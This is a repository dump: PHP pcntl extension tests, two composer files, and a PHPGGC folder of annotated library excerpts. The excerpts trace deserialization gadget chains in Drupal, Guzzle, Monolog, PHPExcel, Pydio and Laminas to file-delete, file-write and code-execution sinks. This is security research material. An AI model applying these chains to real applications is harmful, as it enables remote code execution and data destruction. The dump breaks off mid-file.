 1 | --TEST--
 2 | pcntl_signal()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | pcntl_signal(SIGTERM, function($signo){
 9 | 	echo "signal dispatched\n";
10 | });
11 | posix_kill(posix_getpid(), SIGTERM);
12 | pcntl_signal_dispatch();
13 | 
14 | pcntl_signal(SIGUSR1, function($signo, $siginfo){
15 | 	printf("got signal from %s\n", $siginfo['pid'] ?? 'nobody');
16 | });
17 | posix_kill(posix_getpid(), SIGUSR1);
18 | pcntl_signal_dispatch();
19 | 
20 | var_dump(pcntl_signal());
21 | var_dump(pcntl_signal(SIGALRM, SIG_IGN));
22 | var_dump(pcntl_signal(-1, -1));
23 | var_dump(pcntl_signal(-1, function(){}));
24 | var_dump(pcntl_signal(SIGALRM, "not callable"));
25 | 
26 | 
27 | /* test freeing queue in RSHUTDOWN */
28 | posix_kill(posix_getpid(), SIGTERM);
29 | echo "ok\n";
30 | ?>
31 | --EXPECTF--
32 | signal dispatched
33 | got signal from %r\d+|nobody%r
34 | 
35 | Warning: pcntl_signal() expects at least 2 parameters, 0 given in %s
36 | NULL
37 | bool(true)
38 | 
39 | Warning: pcntl_signal(): Invalid signal %s
40 | bool(false)
41 | 
42 | Warning: pcntl_signal(): Invalid signal %s
43 | bool(false)
44 | 
45 | Warning: pcntl_signal(): not callable is not a callable function name error in %s
46 | bool(false)
47 | ok
48 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_signal_dispatch.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcnt_signal_dispatch()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip";
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("pcntl_signal_dispatch")) print "skip pcntl_signal_dispatch() not available";
 8 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 9 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
10 | ?>
11 | --FILE--
12 | <?php
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | pcntl_signal_dispatch();
20 | echo "Done!\n";
21 | 
22 | ?>
23 | --EXPECTF--
24 | Start!
25 | Signal handler called!
26 | Done!
27 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_signal_get_handler.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_signal_get_handler()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | var_dump(pcntl_signal_get_handler(SIGUSR1));
 9 | 
10 | function pcntl_test($signo) {}
11 | pcntl_signal(SIGUSR1, 'pcntl_test');
12 | var_dump(pcntl_signal_get_handler(SIGUSR1));
13 | 
14 | pcntl_signal(SIGUSR1, SIG_DFL);
15 | var_dump(pcntl_signal_get_handler(SIGUSR1));
16 | 
17 | pcntl_signal(SIGUSR1, SIG_IGN);
18 | var_dump(pcntl_signal_get_handler(SIGUSR1));
19 | 
20 | posix_kill(posix_getpid(), SIGUSR1);
21 | pcntl_signal_dispatch();
22 | 
23 | echo "ok\n";
24 | ?>
25 | --EXPECTF--
26 | int(0)
27 | string(10) "pcntl_test"
28 | int(0)
29 | int(1)
30 | ok
31 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_wait.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_wait()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | $pid = pcntl_fork();
 9 | if ($pid == -1) {
10 | 	die("failed");
11 | } else if ($pid) {
12 | 	$status = 0;
13 | 	pcntl_wait($status, WUNTRACED);
14 | 	var_dump(pcntl_wifexited($status));
15 | 	posix_kill($pid, SIGCONT);
16 | 
17 | 	pcntl_wait($status);
18 | 	var_dump(pcntl_wifsignaled($status));
19 | 	var_dump(pcntl_wifstopped($status));
20 | 	var_dump(pcntl_wexitstatus($status));
21 | 
22 | 	var_dump(pcntl_wait($status, WNOHANG | WUNTRACED));
23 | 	var_dump(pcntl_wait());
24 | 	var_dump(pcntl_waitpid());
25 | 
26 | 	var_dump(pcntl_wifexited());
27 | 	var_dump(pcntl_wifstopped());
28 | 	var_dump(pcntl_wifsignaled());
29 | 	var_dump(pcntl_wexitstatus());
30 | 	var_dump(pcntl_wtermsig());
31 | 	var_dump(pcntl_wstopsig());
32 | } else {
33 | 	posix_kill(posix_getpid(), SIGSTOP);
34 | 	exit(42);
35 | }
36 | ?>
37 | --EXPECTF--
38 | bool(false)
39 | bool(false)
40 | bool(false)
41 | int(42)
42 | int(-1)
43 | 
44 | Warning: pcntl_wait() expects at least 1 parameter, 0 given in %s
45 | NULL
46 | 
47 | Warning: pcntl_waitpid() expects at least 2 parameters, 0 given in %s
48 | NULL
49 | 
50 | Warning: pcntl_wifexited() expects exactly 1 parameter, 0 given in %s
51 | NULL
52 | 
53 | Warning: pcntl_wifstopped() expects exactly 1 parameter, 0 given in %s
54 | NULL
55 | 
56 | Warning: pcntl_wifsignaled() expects exactly 1 parameter, 0 given in %s
57 | NULL
58 | 
59 | Warning: pcntl_wexitstatus() expects exactly 1 parameter, 0 given in %s
60 | NULL
61 | 
62 | Warning: pcntl_wtermsig() expects exactly 1 parameter, 0 given in %s
63 | NULL
64 | 
65 | Warning: pcntl_wstopsig() expects exactly 1 parameter, 0 given in %s
66 | NULL
67 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_wait_rusage1.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_wait() and rusage
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | $pid = pcntl_fork();
 9 | if ($pid == -1) {
10 | 	die("failed");
11 | } else if ($pid) {
12 | 	$status = 0;
13 | 	var_dump(pcntl_wait($status, WUNTRACED, $rusage));
14 | 	var_dump($rusage['ru_utime.tv_sec']);
15 | 	var_dump($rusage['ru_utime.tv_usec']);
16 | 
17 | 	posix_kill($pid, SIGCONT);
18 | 
19 | 	$rusage = array(1,2,3);
20 | 	pcntl_wait($status, WUNTRACED, $rusage);
21 | 	var_dump($rusage['ru_utime.tv_sec']);
22 | 	var_dump($rusage['ru_utime.tv_usec']);
23 | 
24 | 	$rusage = "string";
25 | 	pcntl_wait($status, 0, $rusage);
26 | 	var_dump(gettype($rusage));
27 | 	var_dump(count($rusage));
28 | 
29 | 	$rusage = new stdClass;
30 | 	pcntl_wait($status, 0, $rusage);
31 | 	var_dump(gettype($rusage));
32 | 	var_dump(count($rusage));
33 | 
34 | 	echo "END\n";
35 | } else {
36 | 	posix_kill(posix_getpid(), SIGSTOP);
37 | 	exit(42);
38 | }
39 | ?>
40 | --EXPECTF--
41 | int(%d)
42 | int(%d)
43 | int(%d)
44 | int(%d)
45 | int(%d)
46 | string(5) "array"
47 | int(0)
48 | string(5) "array"
49 | int(0)
50 | END
51 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_waitpid_rusage1.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_waitpid() and rusage
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | $pid = pcntl_fork();
 9 | if ($pid == -1) {
10 | 	die("failed");
11 | } else if ($pid) {
12 | 	$status = 0;
13 | 	var_dump(pcntl_waitpid($pid, $status, WUNTRACED, $rusage));
14 | 	var_dump($rusage['ru_utime.tv_sec']);
15 | 	var_dump($rusage['ru_utime.tv_usec']);
16 | 
17 | 	posix_kill($pid, SIGCONT);
18 | 
19 | 	$rusage = array(1,2,3);
20 | 	pcntl_waitpid($pid, $status, WUNTRACED, $rusage);
21 | 	var_dump($rusage['ru_utime.tv_sec']);
22 | 	var_dump($rusage['ru_utime.tv_usec']);
23 | 
24 | 	$rusage = "string";
25 | 	pcntl_waitpid($pid, $status, 0, $rusage);
26 | 	var_dump(gettype($rusage));
27 | 	var_dump(count($rusage));
28 | 
29 | 	$rusage = new stdClass;
30 | 	pcntl_waitpid($pid, $status, 0, $rusage);
31 | 	var_dump(gettype($rusage));
32 | 	var_dump(count($rusage));
33 | 
34 | 	echo "END\n";
35 | } else {
36 | 	posix_kill(posix_getpid(), SIGSTOP);
37 | 	exit(42);
38 | }
39 | ?>
40 | --EXPECTF--
41 | int(%d)
42 | int(%d)
43 | int(%d)
44 | int(%d)
45 | int(%d)
46 | string(5) "array"
47 | int(0)
48 | string(5) "array"
49 | int(0)
50 | END
51 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/signal_closure_handler.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Closures as a signal handler
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip";
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 8 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
 9 | ?>
10 | --FILE--
11 | <?php
12 | declare (ticks = 1);
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | echo "Done!\n";
20 | 
21 | ?>
22 | --EXPECTF--
23 | Start!
24 | Signal handler called!
25 | Done!
26 | 


--------------------------------------------------------------------------------
/Lib/rabbitmq_php/composer.json:
--------------------------------------------------------------------------------
1 | {
2 |     "require": {
3 |         "php-amqplib/php-amqplib": ">=2.6.1"
4 |     }
5 | }
6 | 


--------------------------------------------------------------------------------
/Lib/rabbitmq_php7/composer.json:
--------------------------------------------------------------------------------
1 | {
2 |     "require": {
3 |         "php-amqplib/php-amqplib": ">=2.6.1"
4 |     }
5 | }
6 | 


--------------------------------------------------------------------------------
/PHPGGC/Drupal7_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. Archive_Tar::__destruct
 3 |     2. drupal_unlink
 4 |     3. unlink
 5 | */
 6 | 
 7 | // modules/system/system.tar.inc
 8 | class Archive_Tar {
 9 |     function __destruct() {
10 |         $this->_close();
11 |         // ----- Look for a local copy to delete
12 |         if ($this->_temp_tarname != '')
13 |             @drupal_unlink($this->_temp_tarname); // [*] next
14 |         // $this->_PEAR();
15 |     }
16 | }
17 | 
18 | // includes/file.inc
19 | function drupal_unlink($uri, $context = NULL) {
20 |     $scheme = file_uri_scheme($uri);
21 |     if ((!$scheme || !file_stream_wrapper_valid_scheme($scheme)) && (substr(PHP_OS, 0, 3) == 'WIN')) {
22 |         chmod($uri, 0600);
23 |     }
24 |     if ($context) {
25 |         return unlink($uri, $context);
26 |     }
27 |     else {
28 |         return unlink($uri); // [*] sink
29 |     }
30 | }
31 | 


--------------------------------------------------------------------------------
/PHPGGC/Guzzle_FW1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Cookie\FileCookieJar::__destruct
 3 |     2. \GuzzleHttp\Cookie\FileCookieJar::save
 4 |     3. file_put_contents
 5 | */
 6 | 
 7 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php
 8 | namespace GuzzleHttp\Cookie;
 9 | class FileCookieJar extends CookieJar {
10 |     public function __destruct() {
11 |         $this->save($this->filename); // [*] next
12 |     }
13 |     
14 |     public function save($filename) {
15 |         $json = [];
16 |         foreach ($this as $cookie) {
17 |             /** @var SetCookie $cookie */
18 |             if ($cookie->getExpires() && !$cookie->getDiscard()) {
19 |                 $json[] = $cookie->toArray();
20 |             }
21 |         }
22 | 
23 |         if (false === file_put_contents($filename, json_encode($json))) { // [!] sink
24 |             throw new \RuntimeException("Unable to save file {$filename}");
25 |         }
26 |     }
27 | }
28 | 
29 | // ======== REF ======== 
30 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php
31 | namespace GuzzleHttp\Cookie;
32 | class SetCookie {
33 |     public function getExpires() {
34 |         return $this->data['Expires'];
35 |     }
36 |     
37 |     public function getDiscard() {
38 |         return $this->data['Discard'];
39 |     }
40 |     
41 |     public function toArray() {
42 |         return $this->data;
43 |     }
44 | }


--------------------------------------------------------------------------------
/PHPGGC/Guzzle_INFO1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Psr7\FnStream::__destruct
 3 |     2. call_user_func
 4 | */
 5 | 
 6 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/psr7/src/FnStream.php
 7 | namespace GuzzleHttp\Psr7;
 8 | class FnStream implements StreamInterface {
 9 |     public function __destruct() {
10 |         if (isset($this->_fn_close)) {
11 |             call_user_func($this->_fn_close); // [*] sink
12 |         }
13 |     }
14 | }


--------------------------------------------------------------------------------
/PHPGGC/Guzzle_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Psr7\FnStream::__destruct // call_user_func
 3 |     2. \GuzzleHttp\HandlerStack::resolve
 4 |     3. $fn[0]($prev)
 5 | */
 6 | 
 7 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/psr7/src/FnStream.php
 8 | namespace GuzzleHttp\Psr7;
 9 | class FnStream implements StreamInterface {
10 |     public function __destruct() {
11 |         if (isset($this->_fn_close)) {
12 |             call_user_func($this->_fn_close); // [*] next
13 |                                               // [!] need to set $this->_fn_close to call \GuzzleHttp\HandlerStack::resolve
14 |         }
15 |     }
16 | }
17 | 
18 | // wp-content/themes/twentytwenty/Guzzle-6.0.0/vendor/guzzlehttp/guzzle/src/HandlerStack.php
19 | namespace GuzzleHttp;
20 | class HandlerStack {
21 |     public function resolve() {
22 |         if (!($prev = $this->handler)) {
23 |             throw new \LogicException('No handler has been specified');
24 |         }
25 | 
26 |         foreach (array_reverse($this->stack) as $fn) {
27 |             $prev = $fn[0]($prev); // [*] sink
28 |         }
29 | 
30 |         return $prev;
31 |     }
32 | }


--------------------------------------------------------------------------------
/PHPGGC/Laminas_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Laminas\Http\Response\Stream::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // vendor/laminas/laminas-http/src/Response/Stream.php
 7 | class Stream extends Response {
 8 |     public function __destruct() {
 9 |         if (is_resource($this->stream)) {
10 |             $this->stream = null; //Could be listened by others
11 |         }
12 |         if ($this->cleanup) {
13 |             ErrorHandler::start(E_WARNING);
14 |             unlink($this->streamName); // [*] sink
15 |             ErrorHandler::stop();
16 |         }   
17 | }


--------------------------------------------------------------------------------
/PHPGGC/Monolog_RCE1.php:
--------------------------------------------------------------------------------
  1 | /*
  2 |     1. \Monolog\Handler\SyslogUdpHandler(\Monolog\Handler\AbstractHandler)::__destruct
  3 |     2. \Monolog\Handler\SyslogUdpHandler::close
  4 |     3. \Monolog\Handler\BufferHandler::close
  5 |     4. \Monolog\Handler\BufferHandler::flush
  6 |     5. \Monolog\Handler\BufferHandler(\Monolog\Handler\AbstractHandler)::handleBatch
  7 |     6. \Monolog\Handler\BufferHandler::handle
  8 |     7. call_user_func
  9 | */
 10 | 
 11 | // vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php
 12 | namespace Monolog\Handler;
 13 | class SyslogUdpHandler extends AbstractSyslogHandler {
 14 | }
 15 | 
 16 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php
 17 | namespace Monolog\Handler;
 18 | abstract class AbstractSyslogHandler extends AbstractProcessingHandler {
 19 | }
 20 | 
 21 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php
 22 | namespace Monolog\Handler;
 23 | abstract class AbstractProcessingHandler extends AbstractHandler {
 24 | }
 25 | 
 26 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
 27 | namespace Monolog\Handler;
 28 | abstract class AbstractHandler implements HandlerInterface {
 29 |     public function __destruct() {
 30 |         try {
 31 |             $this->close(); // [*] next
 32 |         } catch (\Exception $e) {
 33 |             // do nothing
 34 |         }
 35 |     }
 36 | }
 37 | 
 38 | // vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php
 39 | namespace Monolog\Handler;
 40 | class SyslogUdpHandler extends AbstractSyslogHandler {
 41 |     public function close() {
 42 |         $this->socket->close(); // [*] next
 43 |     }
 44 | }
 45 | 
 46 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
 47 | namespace Monolog\Handler;
 48 | class BufferHandler extends AbstractHandler {
 49 |     public function close() {
 50 |         $this->flush(); // [*] next
 51 |     }
 52 |     
 53 |     public function flush() {
 54 |         if ($this->bufferSize === 0) {
 55 |             return;
 56 |         }
 57 | 
 58 |         $this->handler->handleBatch($this->buffer); // [*] next
 59 |         $this->clear();
 60 |     }
 61 | }
 62 | 
 63 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
 64 | namespace Monolog\Handler;
 65 | abstract class AbstractHandler implements HandlerInterface {
 66 |     public function handleBatch(array $records) {
 67 |         foreach ($records as $record) {
 68 |             $this->handle($record); // [*] next
 69 |         }
 70 |     }
 71 | }
 72 | 
 73 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
 74 | namespace Monolog\Handler;
 75 | class BufferHandler extends AbstractHandler {
 76 |     public function handle(array $record) {
 77 |         if ($record['level'] < $this->level) {
 78 |             return false;
 79 |         }
 80 | 
 81 |         if (!$this->initialized) {
 82 |             // __destructor() doesn't get called on Fatal errors
 83 |             register_shutdown_function(array($this, 'close'));
 84 |             $this->initialized = true;
 85 |         }
 86 | 
 87 |         if ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) {
 88 |             if ($this->flushOnOverflow) {
 89 |                 $this->flush();
 90 |             } else {
 91 |                 array_shift($this->buffer);
 92 |                 $this->bufferSize--;
 93 |             }
 94 |         }
 95 | 
 96 |         if ($this->processors) {
 97 |             foreach ($this->processors as $processor) {
 98 |                 $record = call_user_func($processor, $record); // [*] sink
 99 |             }
100 |         }
101 | 
102 |         $this->buffer[] = $record;
103 |         $this->bufferSize++;
104 | 
105 |         return false === $this->bubble;
106 |     }
107 | }


--------------------------------------------------------------------------------
/PHPGGC/Monolog_RCE2.php:
--------------------------------------------------------------------------------
  1 | /*
  2 |     1. \Monolog\Handler\SyslogUdpHandler(\Monolog\Handler\AbstractHandler)::__destruct
  3 |     2. \Monolog\Handler\SyslogUdpHandler::close
  4 |     3. \Monolog\Handler\BufferHandler::close
  5 |     4. \Monolog\Handler\BufferHandler::flush
  6 |     5. \Monolog\Handler\BufferHandler(\Monolog\Handler\AbstractHandler)::handleBatch
  7 |     6. \Monolog\Handler\BufferHandler::handle
  8 |     7. call_user_func
  9 | */
 10 | 
 11 | // vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php
 12 | namespace Monolog\Handler;
 13 | class SyslogUdpHandler extends AbstractSyslogHandler {
 14 | }
 15 | 
 16 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php
 17 | namespace Monolog\Handler;
 18 | abstract class AbstractSyslogHandler extends AbstractProcessingHandler {
 19 | }
 20 | 
 21 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php
 22 | namespace Monolog\Handler;
 23 | abstract class AbstractProcessingHandler extends AbstractHandler {
 24 | }
 25 | 
 26 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
 27 | namespace Monolog\Handler;
 28 | abstract class AbstractHandler implements HandlerInterface {
 29 |     public function __destruct() {
 30 |         try {
 31 |             $this->close(); // [*] next
 32 |         } catch (\Exception $e) {
 33 |             // do nothing
 34 |         }
 35 |     }
 36 | }
 37 | 
 38 | // vendor/monolog/monolog/src/Monolog/Handler/SyslogUdpHandler.php
 39 | namespace Monolog\Handler;
 40 | class SyslogUdpHandler extends AbstractSyslogHandler {
 41 |     public function close(){
 42 |         $this->socket->close(); // [*] next
 43 |     }
 44 | }
 45 | 
 46 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
 47 | namespace Monolog\Handler;
 48 | class BufferHandler extends AbstractHandler {
 49 |     public function close() {
 50 |         $this->flush(); // [*] next
 51 |     }
 52 |     
 53 |     public function flush() {
 54 |         if ($this->bufferSize === 0) {
 55 |             return;
 56 |         }
 57 | 
 58 |         $this->handler->handleBatch($this->buffer);
 59 |         $this->bufferSize = 0;
 60 |         $this->buffer = array();
 61 |     }
 62 | }
 63 | 
 64 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
 65 | namespace Monolog\Handler;
 66 | abstract class AbstractHandler implements HandlerInterface {
 67 |     public function handleBatch(array $records) {
 68 |         foreach ($records as $record) {
 69 |             $this->handle($record); // [*] next
 70 |         }
 71 |     }
 72 | }
 73 | 
 74 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
 75 | namespace Monolog\Handler;
 76 | class BufferHandler extends AbstractHandler {
 77 |     public function handle(array $record) {
 78 |         if ($record['level'] < $this->level) {
 79 |             return false;
 80 |         }
 81 | 
 82 |         if ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) {
 83 |             if ($this->flushOnOverflow) {
 84 |                 $this->flush();
 85 |             } else {
 86 |                 array_shift($this->buffer);
 87 |                 $this->bufferSize--;
 88 |             }
 89 |         }
 90 | 
 91 |         if ($this->processors) {
 92 |             foreach ($this->processors as $processor) {
 93 |                 $record = call_user_func($processor, $record); // [*] sink
 94 |             }
 95 |         }
 96 | 
 97 |         $this->buffer[] = $record;
 98 |         $this->bufferSize++;
 99 | 
100 |         return false === $this->bubble;
101 |     }
102 | }


--------------------------------------------------------------------------------
/PHPGGC/Monolog_RCE3.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \Monolog\Handler\BufferHandler(\Monolog\Handler\AbstractHandler)::__destruct
 3 |     2. \Monolog\Handler\BufferHandler::close
 4 |     3. \Monolog\Handler\BufferHandler::flush
 5 |     4. \Monolog\Handler\NativeMailerHandler(\Monolog\Handler\MailHandler)::handleBatch
 6 |     5. \Monolog\Handler\NativeMailerHandler(\Monolog\Handler\AbstractHandler)::processRecord
 7 |     6. call_user_func
 8 | */
 9 | 
10 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
11 | namespace Monolog\Handler;
12 | class BufferHandler extends AbstractHandler {
13 | }
14 | 
15 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
16 | namespace Monolog\Handler;
17 | abstract class AbstractHandler implements HandlerInterface {
18 |     public function __destruct()
19 |     {
20 |         try {
21 |             $this->close(); // [*] next
22 |         } catch (\Exception $e) {
23 |             // do nothing
24 |         }
25 |     }
26 | }
27 | 
28 | // vendor/monolog/monolog/src/Monolog/Handler/BufferHandler.php
29 | namespace Monolog\Handler;
30 | class BufferHandler extends AbstractHandler {
31 |     public function close() {
32 |         $this->flush(); // [*] next
33 |     }
34 |     
35 |     public function flush() {
36 |         if ($this->bufferSize === 0) {
37 |             return;
38 |         }
39 | 
40 |         $this->handler->handleBatch($this->buffer); // [*] next
41 |         $this->bufferSize = 0;
42 |         $this->buffer = array();
43 |     }
44 | }
45 | 
46 | // vendor/monolog/monolog/src/Monolog/Handler/NativeMailerHandler.php
47 | namespace Monolog\Handler;
48 | class NativeMailerHandler extends MailHandler {
49 | }
50 | 
51 | // vendor/monolog/monolog/src/Monolog/Handler/MailHandler.php
52 | namespace Monolog\Handler;
53 | abstract class MailHandler extends AbstractProcessingHandler {
54 |     public function handleBatch(array $records) {
55 |         $messages = array();
56 | 
57 |         foreach ($records as $record) {
58 |             if ($record['level'] < $this->level) {
59 |                 continue;
60 |             }
61 |             $messages[] = $this->processRecord($record); // [*] next
62 |         }
63 | 
64 |         if (!empty($messages)) {
65 |             $this->send((string) $this->getFormatter()->formatBatch($messages), $messages);
66 |         }
67 |     }
68 | }
69 | 
70 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractProcessingHandler.php
71 | namespace Monolog\Handler;
72 | abstract class AbstractProcessingHandler extends AbstractHandler {
73 | }
74 | 
75 | // vendor/monolog/monolog/src/Monolog/Handler/AbstractHandler.php
76 | namespace Monolog\Handler;
77 | abstract class AbstractHandler implements HandlerInterface {
78 |     protected function processRecord(array $record) {
79 |         if ($this->processors) {
80 |             foreach ($this->processors as $processor) {
81 |                 $record = call_user_func($processor, $record); // [*] sink
82 |             }
83 |         }
84 | 
85 |         return $record;
86 |     }
87 | }


--------------------------------------------------------------------------------
/PHPGGC/PHPExcel_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_CachedObjectStorage_DiscISAM::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
 7 | class PHPExcel_CachedObjectStorage_DiscISAM extends PHPExcel_CachedObjectStorage_CacheBase implements PHPExcel_CachedObjectStorage_ICache {
 8 |     public function __destruct() {
 9 |         if (!is_null($this->fileHandle)) {
10 |             fclose($this->fileHandle);
11 |             unlink($this->fileName); // [*] sink
12 |         }
13 |         $this->fileHandle = null;
14 |     }
15 | }


--------------------------------------------------------------------------------
/PHPGGC/PHPExcel_FD2.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_CachedObjectStorage_DiscISAM::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
 7 | class PHPExcel_CachedObjectStorage_DiscISAM extends PHPExcel_CachedObjectStorage_CacheBase implements PHPExcel_CachedObjectStorage_ICache {
 8 |     public function __destruct() {
 9 |         if (!is_null($this->_fileHandle)) {
10 |             fclose($this->_fileHandle);
11 |             unlink($this->_fileName); // [*] sink
12 |         }
13 |         $this->_fileHandle = null;
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/PHPGGC/PHPExcel_FD3.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_Shared_XMLWriter::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // wp-content/themes/twentytwenty/PHPExcel-1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
 7 | class PHPExcel_Shared_XMLWriter extends XMLWriter {
 8 |     public function __destruct() {
 9 |         // Unlink temporary files
10 |         if ($this->tempFileName != '') {
11 |             @unlink($this->tempFileName); // [*] sink
12 |         }
13 |     }
14 | }


--------------------------------------------------------------------------------
/PHPGGC/PHPExcel_FD4.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. PHPExcel_Shared_XMLWriter::__destruct
 3 |     2. unlink
 4 | */
 5 | 
 6 | // wp-content/themes/twentytwenty/PHPExcel-1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
 7 | class PHPExcel_Shared_XMLWriter extends XMLWriter {
 8 |     public function __destruct() {
 9 |         // Unlink temporary files
10 |         if ($this->_tempFileName != '') {
11 |             @unlink($this->_tempFileName); // [*] sink
12 |         }
13 |     }
14 | }


--------------------------------------------------------------------------------
/PHPGGC/Pydio_Guzzle_RCE1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. \GuzzleHttp\Psr7\FnStream::__toString // call_user_func
 3 |     2. callRegisteredShutdown::callRegisteredShutdown
 4 |     3. call_user_func_array
 5 | */
 6 | 
 7 | // core/vendor/guzzlehttp/psr7/src/FnStream.php
 8 | class FnStream implements StreamInterface {
 9 |     public function __toString() {
10 |         return call_user_func($this->_fn___toString); // [*] next
11 |                                                       // [!] need to set $this->_fn___toString to call callRegisteredShutdown::callRegisteredShutdown
12 |     }
13 | }
14 | 
15 | // core/src/pydio/Core/Controller/ShutdownScheduler.php
16 | class ShutdownScheduler {
17 |     public function callRegisteredShutdown($cliOutput = null) {
18 |         session_write_close();
19 |         ob_end_flush();
20 |         flush();
21 |         $index = 0;
22 |         while (count($this->callbacks)) {
23 |             $arguments = array_shift($this->callbacks);
24 |             $callback = array_shift($arguments);
25 |             try {
26 |                 if($cliOutput !== null){
27 |                     $cliOutput->writeln("<comment>--> Applying Shutdown Hook: ". get_class($callback[0]) ."::".$callback[1]."</comment>");
28 |                 }
29 |                 call_user_func_array($callback, $arguments); // [*] sink
30 |             } catch (PydioException $e) {
31 |                 Logger::error(__CLASS__, __FUNCTION__, array("context" => "Applying hook " . get_class($callback[0]) . "::" . $callback[1], "message" => $e->getMessage()));
32 |             }
33 |             $index++;
34 |             if($index > 100000) {
35 |                 Logger::error(__CLASS__, __FUNCTION__, "Breaking ShutdownScheduler loop, seems too big (100000)");
36 |                 break;
37 |             }
38 |         }
39 |     }
40 | }


--------------------------------------------------------------------------------
/PHPGGC/Smarty_FD1.php:
--------------------------------------------------------------------------------
 1 | /*
 2 |     1. Smarty_Internal_Template::__destruct
